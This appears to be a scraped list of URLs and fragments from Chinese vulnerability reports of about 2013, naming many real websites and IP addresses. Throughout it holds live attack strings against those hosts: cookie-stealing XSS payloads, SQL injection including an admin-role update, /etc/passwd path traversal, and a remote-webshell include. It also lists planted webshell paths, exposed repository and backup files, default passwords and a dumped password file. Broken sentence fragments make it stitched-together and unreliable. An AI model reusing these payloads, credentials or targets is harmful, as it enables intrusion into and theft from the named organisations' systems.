http://zq.17173.com/dnf/act1228/list.php?button=%e6%90%9c%e7%b4%a2&na=&ord=11&tp=1 http://mds.coi.gov.cn/UploadFile/ http://mds.coi.gov.cn/test.txt http://mds.coi.gov.cn/cmdasp.asp http://weigou.baidu.com/ http://weigou.baidu.com/item?id=176584328&province=北京&query=樱花 http://report.mplife.com/ http://report.mplife.com/data/line/small/2013/11/26/1385437544300217664.jpg/1.php http://bbs.52pk.com//config/config_global.php.bak http://www.520.net http://www.vmaibo.com/timer data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://skype.gmw.cn/file/d.html?fileName=SkypeSetupFull.6.11.99.102.exe http://en.100e.com/buy/register_submit.asp http://www.zy.jj.cn/ucenter/data/config.inc http://www.zy.jj.cn/static/.svn/entries http://www.zy.jj.cn/api/.svn/entries http://www.zy.jj.cn/expo/images/fair/.svn/entries http://www.zy.jj.cn/admin.php http://api.kuailezu.com/index.php?m=room.getHeadImage&agent_key=f0d1xxxxxxab30&agent_id=2186396&id=10458 http://libao.game.pps.tv/lbcenter/home/index?searchText=%D3%CE%CF%B7%C3%FB%B3%C6%A1%A2%C0%F1%B0%FC%C3%FB%B3%C6 http://jizhe.hinews.cn/read.php?id=290 http://project.ccidnet.com/ http://gz.ip66.com/ip66.rar http://shop.snupg.com/help/article.jsp?id=12213&nodeid=1088&siteid=42 http://hd.iiyi.com/perfection http://per.120ask.com/?c=ask_user&m=info里了、 http://www.iiyi.com/zj/zhji.php http://liuxuenote.eol.cn/index.php?country_id=4 http://tiaoji.eol.cn/end.php?info_id=223438 http://www.gzl.com.cn/ http://www.gzl.com.cn/Users/Order/Groups.aspx?OrderId=订单号 http://appapi.jiumei.com/interface.aspx http://buy.mplife.com/admin/index/login http://www.jxss.gov.cn/admin/login.aspx http://cp.g.candou.com/.svn/entries http://cee.gov.cn/admin/system/ http://a1538033451.i.sohu.com/v2/ http://www.peoplepress.net/app/message.action server:/usr/java/jdk1.6.0_11/jre/lib/amd64:/usr/java/jdk1.6.0_11/jre/../lib/amd64:/trs/trsbean:/usr/java/packages/lib/amd64:/lib:/usr/lib http://java.sun.com/ http://horizon.lenovo.com.cn/data/login http://wooyun.org/bugs/wooyun-2013-042463 http://115.182.21.31:8089/sms/ http://115.182.21.31:8089/codegen/ http://admin:admin@115.182.21.31:8089/manager/html http://202.118.201.216/daw/content.asp?conid=88 http://www.joyoung.com/upload/img.jsp https://support.dnspod.cn/Kb/showarticle/?tsid=%22%3E%3Cscript%3Ealert%28%2708sec%27%29%3C/script%3E&qtype=%E5%8A%9F%E8%83%BD%E4%BB%8B%E7%BB%8D%E5%8F%8A%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B http://softserver1.stock.hexun.com/TraderStar/userregister/checkmobile.php?mobile= http://www.wzjyj.gov.cn/diy.asp http://campus.app.dajie.com/m/Compus http://jlb.96211.com http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398 http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398 http://www.huihui.cn/ http://roc.iyoudao.net/dailyapp.php Date:2013-11-27 OS:Windows Browser:Chrome http://zy.jj.cn/admin.php http://hve.hep.com.cn/hep/plugin/gaozhi/test/books.jsp?resId=2388 http://vote.stcn.com/ccvc2013/tp.jsp?sid=6422 http://vote.stcn.com/ccvc2013/tp.jsp?sid=6422 http://3g.dahe.cn http://3g.dahe.cn/user/catch_list.php?cid=1 http://3g.dahe.cn/user/login.php http://www.cdgwbn.com.cn/index.php?m=Article&temp=yhsc&cate_id=13 http://www.xmgwbn.com/job/main.php?id=36 URL:http://iscm.gdtel.com.cn/shop/shop/index!index.action http://zzb.dahe.cn http://zzb.dahe.cn/fore/onclickNews.shtml?fdate=&layoutID=1 http://rol.nsfc.gov.cn/scm/index http://www.dtsrd.gov.cn/List.asp?action=list&newsclass=20 http://www.dtsrd.gov.cn/List.asp?action=list&newsclass=20 http://3g.dahe.cn http://3g.dahe.cn/user/template_list.php?cid=1 http://3g.dahe.cn/user/news_list.php?cid=1 http://e-learning.lenovo.com.cn/ask/answer/ask_id/1106 http://e-learning.lenovo.com.cn/ask/search/keyword/NVIDIA http://kabedm.lenovo.com.cn/rel20130527/admin/Login.asp http://kabedm.lenovo.com.cn/link/ http://58.215.167.153 http://km.ip66.com/Obj51Me/shouji-mod.php?id=4’ http://km.ip66.com/Obj51Me/shouji-mod.php?id=4 http://km.ip66.com/Obj51Me/shouji-mod.php?id=4 http://www.zhulang.com/w_gg_detail.php?g_id=144 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin tanght:x:501:501::/home/tanght:/bin/bash http://pan.baidu.com/pcloud/feed/getsharelist?t=1385071401108&category=0&auth_type=1&request_location=share_home&start=0&limit=60&query_uk=1513210475 http://party.vmovier.com/wp-login.php http://t.jj.cn/hd_match_enter.php?action=match_enter http://222.184.122.97/ http://222.184.122.97/broadcast.tar.gz http://222.184.122.97/cpws.tar.gz http://222.184.122.97/broadcast/bookmanage.php http://wcba.hupu.com/schedule/stats-W2014001 http://resource.stockstar.com/vote/votejs.asp?vote_id=10 http://info.stockstar.com/survey/inquiry/view.asp?answer=1&votesubmit=88952634&view=88952634&id=8599 http://eshipping.airchinacargo.com/Default.aspx http://ui.letv.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065 http://user.yeeyan.org/u/452442 http://www.cqaipu666.com/admin.php http://www.cqaipu666.com/news/pics/20131127/201311271385554895272.php;.jpg http://121.14.161.118:8022/ http://srun.com/case.html) http://ask.qyer.com/question/717459.html https://jm.jtyjy.com:8443/CDGServer3/logincontroller https://esafe.jsptpd.com:8443 https://61.141.236.16:8443 https://ticket.qdccb.com/eticket/ticketList.do http://g.csztv.cn/tuangou?cid=1 http://www.ztbest.com/manageloginztsh.aspx?action=merchant http://www.ztbest.com/biz/ProductAdd.aspx?id=201 http://yaoguobbs.duowan.com/ http://www.258**.com/)发现发布了”【挂号机:苍海狂扫·挂机版1.5】”,说明可能存在可以进行暴力破解的接口,对其进行逆向工程后发现如下信息: http://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=forrwjpq8in3sihmkqw1pep3&redirect_uri=http%3a%2f%2fwww.renren.com%2fbind%2fbaidu%2fbaidulogincallback&confirm_login=2 https://openapi.baidu.com/oauth/2.0/userlogin http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059&search_type=1&actiontype=0 http://world.hupu.com/servers http://t1.world.hupu.com/?s=1 http://s1.world.hupu.com/?s=255 http://m.verycd.com/report_error/ http://htravel.haier.com/loginAction!doLogin.action http://hrois.haier.net/security/login.action http://www.3399.com http://www.3399.com/games/39706.html http://www.3399.com/games/40372.html http://app.lenovo-rel.com/admin/order http://www.heilan.com.cn/ogilvy_sys/index.php http://zdxm.ziyang.gov.cn:8580/zyxmk/login.do http://zdxm.ziyang.gov.cn:8580/zyxmk/shell.jsp http://xk.cnu.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://club.jj.cn/detail/index.php?cid=2010275 http://club.jj.cn/commune_join/join.php?keywords=asdf&act=search http://www.iiyi.com/med/index.php http://hg.airchinacargo.com/index.aspx http://www.chinadami.com/ http://www.chinadami.com/show.php?nr=3&uid=9514&xid=589 http://xss.re/*** http://webqm.sysop.duowan.com:8080/ http://www.wfwj.gov.cn/wnewsView.jsp?id=739 http://www.wfwj.gov.cn/admin/ http://yz.chsi.com.cn/user/findpwd.do中, http://manage.139site.com/login.jsp http://dd.search.360buy.com/?uid=jambol http://www.huazhu.com/PointGift/ListView.aspx?giftTypeId=3&memberType=2&giftTypeId_Child=37 http://www.huazhu.com/PointGift/ListView http://www.zte-d.com/admin/index.php http://www.youdao.com/search?q=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%27%3B%3C%2Fscript%3E&lq=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%E2%80%98%3B%3C%2Fscript%3E&ue=utf8&T1=1385617251439&keyfrom=web.top&vendor=360z http://www.youdao.com/search?q=%27%7D%3Balert%28document.cookie%29%3C%2Fscript%3E&lq=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%E2%80%98%3B%3C%2Fscript%3E&ue=utf8&T1=1385617282249&keyfrom=web.top&vendor=360z http://202.85.212.171:8088/login.action http://ww.tennis.com.cn/phpmyadmin/ http://sale.jd.com/act/rSR4ExMjOnyGwWmf.html?erpad_source=erpad http://mday.jd.com/play/fanpai.swf http://www.xxlyj.gov.cn/plus/mytag_js.php?aid=9090 http://dellcity.dell-brand.com/admin/ http://dellcity.dell-brand.com/admin/aut/aut_list.php http://223797634.show.jj.cn/myactive/ http://223797634.show.jj.cn/photo_list_newest/ http://223797634.show.jj.cn/myactive/ http://t.jj.cn/index.php?action=index www.xiaomi.com开启了登陆保护后,登陆需要输入小米安全令牌生成的验证码,若要绕过验证码只需要先从i.xiaomi.com登陆,然后刷新小米主站即可。 http://183.232.65.96:443/byqs/admin/login.action http://183.232.65.96:443/byqs/shell.jsp http://www2.easou.com:8080/2.jsp http://hr.sf-express.com/ index.php/position/list/keywords/1/lid/rid/tid/1*/10/page/2.html http://hr.sf-express.com:80/ http://show.jj.cn/ http://www.qiongzhong.gov.cn/asp_newslist.asp?ClassID=154,后进一步通过工具扫描,发现该服务器存在多处注入: http://m.jinti.com/shenghuofuwu/wap_allInfo.aspx?areaid=331 http://khd.gd118114.cn/cms/ http://khd.gd118114.cn/cms/sys/user/login.action http://lvyou.baidu.com/notes/ http://lvyou.baidu.com/notes/7292ef0ac336aec206068107 http://lvyou.baidu.com/notes/e81ecb1fabb7e03a496792a1 http://lvyou.baidu.com/notes/9c9731d883f5c6c123f371b7 http://roowei.com/js/ads.php?action=ads&ads_id= http://www.cn.roowei.com/Public/comcount.php?ac http://kf.joyoung.com/commonQuestion.html http://show.yoka.com/brandlist.php?showid=20&cityid=1 http://bbs.duba.net/forum.php?mod=viewthread&tid=22953419): http://www.qhdcgj.gov.cn/index.php?m=new_look&typeid=26&id=696 http://register.ccidnet.com/passport/passport http://app.ent.ifeng.com/constellation/admin/usrjson.php http://admin.vhost.com/Jingliban.asp http://admin.vhost.com/ http://www.taozfu.com/pview.php?id=2321 http://www.taozfu.com/pview.php?id=660 site:taobao.com filetype:swf http://lz.taobao.com/s/febase/swf/column.swf】: http://app.114la.com/?classid=3 http://bianlun.7k7k.com http://bianlun.7k7k.com/comment.php?action=support&site=pk&aid=123&who=1&t=1385710179528 http://mms.people.com.cn http://mms.people.com.cn/music/admin/song_edit.php?id=29 http://mms.people.com.cn/music/admin/login.php http://liuxueku.people.com.cn http://liuxueku.people.com.cn/jiaoren/senddata.aspx http://ln.wap.wo.com.cn http://ln.wap.wo.com.cn/ivod/i/cc.rar http://ln.wap.wo.com.cn/ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98 http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 http://train.gw.com.cn/includes/page.php?action=article&news_id= http://www.hh010.com/ http://www.hh010.com/database/bencandy.php?fid=3&id=4842 http://eps.jiuyang.com.cn/1.txt# http://demo.xdcms.cn/index.php?m=member&f=edit http://pw.bj.happyvalley.cn/admin/AdminIndex.aspx http://www.laigang.com/Databases/myszw.mdb http://cadmin.aqgj.cn/webhome/news_content.php?id=252 http://zzenglish.cn/zzoss/login.jsp sh.qq.com/zhuanti/adv/xgl.htm http://www.cn.roowei.com/Public/comcount.php?action=up_sell&s_id=413431 http://user.roowei.com/admin http://it.sto.cn/weijinping/showbig.asp?id=46895 site:sto.cn http://www.donic-china.com/showproduct.asp?id=21 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://www.mayi.com/shanghai/这里,也可以是任意一个地区,点击联系房东。 http://lab.ccxx.net/admin/menu.php http://lab.ccxx.net/menu.php http://lab.ccxx.net/admin/login.php http://lab.ccxx.net/admin/inc/ http://lab.ccxx.net:80/user_modify.php?action=%24%7binjecthere%7d http://my.paidai.com/pm.php。使用短消息功能,跟任意用户发送派邮对话, http://log.17k.com/WEB-INF/applicationContext.xml http://www.hnjst.gov.cn:81 http://airchinajet.com/index.php/5167b1c10a?id=7存在注入漏洞 http://www.ddtax.gov.cn/login.asp user:root pass:admin http://esales.ofpay.com/index.do?mode=noticedetail&id=283645 http://www.ln-school.net/email/fujian/mm.asp http://www.ln-school.net/admin/admin_index.aspx http://cjj.dlxgdw.gov.cn/ http://cjj.dlxgdw.gov.cn/upload/mm.asp http://www.dlxgdw.gov.cn/demo.txt http://www.cqcca.com/use_detail.php?ccid=9&kid=104 http://mgs.homeinns.com/motelbbs/Default.asp http://mgs.homeinns.com/motelbbs/new.asp?Sort=1/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6D00670033003100300030003300 http://lxj.ecare365.com/script/common.js http://10.123.51.83/lxjweb/service/userLogon?wsdl http://123.103.23.10/lxjweb/service/userLogon?wsdl http://yao.xywy.com//index.php?a=search&keyword= http://www.74wan.cn/game/game.php?gid=52 http://szy.gx.cn/wrShow/showNew!showNew.show http://fang.miyun360.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php www.xiaocui.org inurl:php http://www.lufada.com.tw/product_list.php?CateId=14 http://tgksound.com.tw/prodcate.php?CateId=1 http://www.yafood.com.tw/product_detail.php?mod=item&PId=3&PPId=8&Id=191 http://www.111g.com/admin/fckeditor/editor/dialog/fck_about.html http://www.111g.com/admin/fckeditor//editor/filemanager/connectors/test.html# www.51web.com www.91zhuji.cn www.51web.com www.91zhuji.cn www.cdnhost.cn http://diysite.cdnhost.cn/company/html/?'367.html http://common.51web.com/dwr/index.html to:xywy http://58.210.35.50/push/iphone/PushHandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/hotel/orderhandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/hotel/orderhandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/MemberShip/ContactHandler.ashx http://www.dabao.com/UserList.aspx http://www.tsjj888.com/lianluo_show.asp?id=1099 http://www.tsjj888.com/lianluo_show.asp?id=1099 http://www.tsjj888.com/admin/default.asp http://www.mayi.com/room/publish/basicinfo http://www.mayi.com/room/850067906 http://www.yinyuetai.com/fan/fan-photo-upload?fid=22885 http://www.cae.com.cn/webfunction/webpage.aspx?nid=18e2b54de8dd444787c9766c478a53aa http://www.cae.com.cn/webfunction/tpc/TPC_Index.aspx?Mid=c19350df7b4e4f33980e039d2563aabc http://www.228.com.cn/regist/regist.html http://legc.lenovo.com/lefactory/staticContent?type=originalAvatar&filename=../../../../etc/passwd http://123.103.23.10/ http://chuangyi.lenovo.com.cn/.svn/entries http://e-learning.lenovo.com.cn/exam.tar http://auto.ynet.com/cgi/auto_photo.php?subid=680 http://gm.fengyunzhibo.com/gamble/ http://user.fengyunzhibo.com/modify.htm http://jizhe.hinews.cn/news.php?td=3 http://book.hinews.cn/archive.php?aid=541347 http://nanhai.hinews.cn/ http://hnmdjd.hinews.cn/user_info.php http://www.tpre.cntaiping.com/eng2/sub_editor_img.asp?catid=40&subcatid=9 http://www.mobage.cn/ http://gg.zzy.cn/sys/login.php http://bbs.meizu.cn http://www.xingechina.com/admin/mrzf/admin_admin.asp http://www.xingechina.com:80/admin/ http://tj.tieyou.com/index.php?param=/notice/detail&id=34 http://union.tieyou.com/index.php?param=/notice/detail&id=26 https://mail.ehicar.com http://i.links.cn/subdomain/ http://appmarket.kingdee.com/。 http://appmarket.kingdee.com/3.txt中发下如下root口令: http://202.108.15.130:7777/mx_antispam/ http://202.108.15.130:7777/mx_antispam/database_backup/ http://202.108.15.130:7777/mx_antispam/log/ http://202.108.15.130:7777/mx_antispam/php_exec/ http://202.108.15.130:7777/mx_antispam/php_exec/display_result_antispam.php http://product.news.sohu.com/ml/cms/pic_edit.php?id=012003%20and%201=2%20union%20select%201,2,user%28%29,4,5,6,7,8,9,10,11,12,13,14 http://zuoye.51taoshi.com/homework/html/.svn/entries http://tsh.51taoshi.com/tsh/.svn/entries http://school.51taoshi.com/school/.svn/entries http://www.crreg.com.cn/xmjs.aspx?id=38 http://opinion.chinabyte.com//.svn/entries http://minisite.youku.com/autobaojun/ http://book.hinews.cn/list.php?caid=27 http://bbs.wacai.com/thread-127071-3-1.html http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash https://www.cmi.chinamobile.com/CPortal/web/web!changeLanguage.action ka.tgbus.com/Search.aspx?k=梦幻卡修 http://zone.pptv.com/molicui/works/getone?id=1285 http://zone.pptv.com/molicui/works/getone?id=1285 http://zone.pptv.com/molicui/works/getone?id=1285 http://www.chinabidding.com.cn/zbw/zbxx/zbgg/sbiao_tj.jsp http://count.hjsm.tom.com/hjsmadmin/admin/test.php http://count.hjsm.tom.com/hjsmadmin/admin/login.php http://sms.tom.com/sms_admin/index.html http://rpc.task.duowan.com/ http://xiu.56.com/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://ued.ctrip.com/blog/?author=1 http://ued.ctrip.com/blog/?author=55 http://ued.ctrip.com/blog/的用户名如下: http://ued.ctrip.com/blog/wp-login.php http://ued.ctrip.com/blog/ http://mail.yto.net.cn/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiaSBsb3ZlIGVtaW5lbSIpPC9zY3JpcHQ+ http://www.ymdj.com.cn/managejoyoung.jsp http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf http://www.xyhui.com/thumb.php?url=远程WEBSHELL文件地址?w=10&h=10 http://www.365tkt.com/?c=order2&a=index Alex-Mac:sqlmapproject-sqlmap-7054586 http://www.365tkt.com/?c=order2&a=index http://dl.powercdn.com/logdown/www.3158.com/www.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/manages.3158.com/manages.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/my.3158.com/my.3158.com_2013-12-01.tar.gz http://dl.powercdn.com/logdown/member.3158.com/member.3158.com_2013-12-01.tar.gz http://www.10jqka.com.cn/school.tar.gz http://361runner.hupu.com/recsites/default_marker/?p_id=1&city_id=321&dist_id=&type_id=11&searchKeywords='&tag=1&page=1&my_localtion=0&field_id=0 http://soccer.hupu.com/live/match.php?id=2089&n=%E8%A5%BF%E7%8F%AD%E7%89%99-%20-%20-Tercera+Division-%20-%20-Rayo+Majadahonda-%20-%20-CD+Mostoles-%20-%20--%20-%20-%E6%91%A9%E6%96%AF%E5%9B%BE%E5%88%A9%E6%96%AF%E5%AE%A4%E5%86%85%E8%B6%B3%E7%90%83%E9%98%9F http://cloud.ecare365.com/admin/Index.htm http://www.d3fys.com/video/?82947-0-0.html发现有篡改路由器DNS的恶意行为 http://cbjs.baidu.com/js/o.js http://cb.baidu.com/ecom?di=820734&fn=BAIDU_CLB_SETJSONADSLOT&tpl=BAIDU_CLB_SETJSONADSLOT&asp_refer=&asp_url=http%3A%2F%2Fwww.d3fys.com%2Fvideo%2F%3F82947-0-0.html&new=8&fv=0&cn=1&if=0&word=asp_url&refer=&ready=1&jn=3&lmt=1385965762&csp=1920,1080&csn=1795,1080&ccd=24&chi=1&cja=false&cpl=17&cmi=23&cce=true&csl=zh-CN&did=6&rt=3&dt=1385965766&c01=0&prt=1385965763671&ps=1631x0&pcs=1280x746&pss=1280x1631&pis=1280x746&cec=gbk&dis=0&baidu_id= http://www.baidu.com/s?wd=%E6%AC%A2%E8%BF%8E%E4%BD%BF%E7%94%A8%E6%B5%99%E5%A4%A7%E6%81%A9%E7%89%B9&pn=0&rn=100&ie=utf-8 http://mail.expacta.com.cn/extmail/tmp/ http://117.79.80.24:8089/ http://redmine.corp.gfan.com:8080/ http://117.79.80.24:8088/ http://zhidao.baidu.com/prof/apply?step=2 http://global.kingdee.com/index.php?option=com_ninjarsssyndicator&feed_id=1&format=raw§ionid=20 http://xxx.eastmoney.com/xx/android/serverlist3.ini这地地址获取了东方财富网的服务器列表! http://forum.housetube.tw/ http://forum.housetube.tw/content.php?cid=112&tid=14033 http://www.norming.com/SinglePages/index?id=1 http://www.pkf-daxin.com/ess/Homepage.action http://erp.chncpa.cc/ess/Homepage.action http://erp.rhcncpa.com/ess/Homepage.action http://ts.iat-auto.com/ess/Homepage.action google:inurl:ess baidu:Norming http://www.zgfjdsw.org.cn/WebSearch.aspx?Keyword=1 http://127.0.0.1/v7/member/index.php?main=pm.php?job=send inurl:u-dsm/login.do http://123.15.54.36:8888/u-dsm/login.do http://jnunis.gicp.net:8085/u-dsm/login.do http://123.15.54.36:8888/u-dsm/shell.jsp http://jnunis.gicp.net:8085/u-dsm/shell.jsp http://sus.lenovomm.com/ http://sus.lenovomm.com http://web.7k7k.com/log.txt http://db.178.com/wow/cn/itemsets.html?su=496509 http://db.178.com/wow/cn/itemsets.html?qu=4 http://converse.56.com/movieshow/nr.php?vodid=3 http://converse.56.com/movieshow/nr.php?vodid=3 inurl:login/Cms.do http://www.xszbjyw.com/cms/login/cms.do http://www.energizepr.com/login/Cms.do http://www.gzrch.com/login/Cms.do http://www.xszbjyw.com/cms/login/cms.do http://www.energizepr.com/login/Cms.do http://www.gzrch.com/login/Cms.do http://www.energizepr.com/shell.jsp http://www.07073.com/plus/zt/index.php?model=20121205&f=personal&id=10569603 http://api.cheshi.com/services/mobile/api.php?api=mobile.wscs_v3.data&act=prd_info&v=3.1&provinceid=1&cityid=0&pid=33673 http://61.157.78.102/shell.jsp http://rslm.g.178.com/main.php?act=members&order=1 http://210.75.208.157/dsqk/dsqkManage.jsp http://210.75.208.157/information/lm_list.jsp?code=xueshuyuandi_%27AND%201=1 http://www.huizhou.gov.cn http://www.huizhou.gov.cn/download.shtml?file=../../../../../../etc/passwd http://spa.changhong.com/sysadmin/index.asp http://wo.07073.com/wo/index.php?con=page&action=soft&do=getListAjax&type=5 http://pc.07073.com/sims3/zhinan/1161.html http://0.openapi2.qfpay.com/trade/v1/tradelist http://dg.tgbus.com/Search.aspx?extname=bmp&typeid=0&app=1 http://dg.tgbus.com/Search.aspx?extname=bmp http://dg.tgbus.com/Search.aspx?extname=bmp http://sdk.zuche.com/CARSDK/services/zuche1 http://sdk.zuche.com/CARSDK/services/zuche1?UpdateUser http://218.206.166.106/lyxt/show.aspx?titleid=39275 http://www.97zh.com/ http://www.97zh.com/admin/fckeditor/editor/filemanager/connectors/test.html http://huodong.gw.com.cn/gold230/detail.php?type=all&id=111 http://www.bfa.gov.cn/ http://www.bfa.gov.cn/login/loginAction!loginsc.dhtml www.koolearn.com http://www.rapoo.cn/NewsCenter.aspx?TID=1没有对参数TID进行过滤导致sql注入。sa权限,可getshell,执行任意命令。 http://www.target.com/siteserver/platform/background_dbSqlQuery.aspx?Table=bairong_CloudStorage&TableID=533576939&DatabaseName=siteserver ldj.jiangmen.gov.cn/uploadfile/2013/0917/20130917095143244.xls http://www.bjpost.com.cn/PostOfficeAction!querybyxzq.action?xzqid=3 http://www.camel.com.cn/myorderdetail.aspx?soid=150 http://musicopen.baidu.com/index.php?c=openuser&m=createCompany&tn=openuser_step2 http://musicopen.baidu.com/index.php?c=openuser&m=createCompany&tn=openuser_step3就把第二步给绕过去直接进入第三步! dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback= http://www.njgwy.gov.cn/gwyLoginAction.action http://www.hd-hotel.com.cn/inc/aspxspy.aspx http://www.btfly.com.cn/admin/Login.asp http://www.huidenet.net www.nmgcy.org.cn http://dts.gw.com.cn/ http://bj.evergrande.com/index.html http://www.yals.gov.cn/Website.zip http://www.gw.com.cn/tzzgx/zixun.php http://log.gw.com.cn http://mo.gw.com.cn/iNewsDetailHtml.php?pageurl=../../../../../../../../../../etc/passwd http://passport.meituan.com/account/check http://secure.verycd.com/ http://v.dahe.cn http://v.dahe.cn/includes/shinyv/increase.php?id=3003&option=com_content http://v.dahe.cn/includes/shinyv/increase.p http://sqlmap.org http://account.nau.edu.cn/admin/ http://crm.tv.tcl.com/DRP/login.action http://cp.ip66.com/hr.php?id=8 http://www.skyexam.com/InfoModel/DownLoadInfoSee.aspx?PKId=264 http://mo.gw.com.cn/admin/login.php http://mo.gw.com.cn/search.php?mobile=kk http://mo.gw.com.cn/type.php?brand=366&typeid=1528 http://job.gw.com.cn/admin/login.php http://eip.tcl.com/initNDSPassword/ModifyNDSPwd.aspx http://www.51cto.com/1.php http://www.51cto.com/mysql.php http://epaper.nsbd.cn/ http://client.hiad365.com http://caservice.hiad365.com http://test.hiad365.com:8086 http://test.hiad365.com:8086 http://www.basha.com.cn/GiftExchange/Result.aspx?s=xxxxxx http://app.clubwanda.com.cn http://www.physics.fudan.edu.cn/tps/sites/phygsu/newtest/editor/admin_uploadfile.asp?id=14&dir=../ http://211.103.182.73:7100/bgpc_carstock_2010/ http://211.103.182.73:7100/bgpc_carstock_2010/qtbul/showBulContent.action http://dev.56.com/wiki/index.php?user-getpass-1.html http://e.189.cn/一个天翼用户中心····好像是新出的。这个是后话了···找回密码 http://www.alskfqgtj.gov.cn/admin/ http://www.alskfqgtj.gov.cn/upFiles/infoImg/no22.asp http://xxdl.gw.com.cn http://xxdl.gw.com.cn/admin http://xxdl.gw.com.cn/marketIframe.jsp?type=0 http://www.csvanke.com http://www.csvanke.com/index.php/csvk_listed4/id/351 http://58.213.112.246:88/hospitalQC/login2.jsp http://baike.aoshu.com/k/gInit?id=14342&t=star&ip=202.118.239.18,%20127.0.0.1&sid=3&star= http://110.1.1.21/ShareSmpp/sendsms.do?from=18638384388&to=10010&msg=101 http://211.151.111.117/ http://61.139.73.103/ http://124.127.255.54/lim/index.php http://124.127.255.194/Authencation/login.aspx http://124.127.255.194/Authencation/login.aspx http://bbs.tga.plu.cn。论坛有个竞猜插件,存在sql注入。 tgabet:official&view=bet&gid=324 http://k.dagexing.com/userfeed?start=0&uid=186464&clienttype=1&num=1&version=1 http://k.dagexing.com/getsonginfo?clienttype=1&siid=a46331775590&version=1&clientversion=1210 http://tieba.baidu.com/home/main?un=%B3%AC%D4%BD%C3%CE%CF%EB92&fr=pb https://123.232.119.126 SID:smesddb http://files.smesd.gov.cn/file/2013/9/4/u171/1uV113484906C90F9A62C81C9B73AE45184AFA5CF7A7.txt http://gtao.me/waimai/Default.aspx?pc=wdk&city=beijing http://www.chinawestair.com/backend/extraProduct/QueryItineraryOrder.action http://www.chinawestair.com/backend/partner/partnermanage.action http://slo.zqgame.com/NewsEvents.html?category_id=30 http://payment.baihe.com/baiheQueryZJSAction.do?orderId=1309172401137023 http://zgqx.zqgame.com/Main/ListPage.aspx?type=news http://www.baidu.com/s?wd=site%3Accw.com.cn++%E5%8D%9A%E5%BD%A9&rsv_bp=0&ch=&tn=snxs_pg&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=21&rsv_sug1=17&rsv_sug4=423&rsv_sug=0&inputT=7015 http://www.changansuzuki.com/ http://support.gw.com.cn/data_serve/setpasswd.php?dotype=html http://www.bensonfund.com/admin_system/UPFile.php http://www.bensonfund.com/admin_system/uplodeimg/1386229596.php http://www.cppcc.gov.cn:8090/gate/big5/www.cppcc.gov.cn/CMS/tianxuandeng/goQueryPageTiAnXuanDeng.action 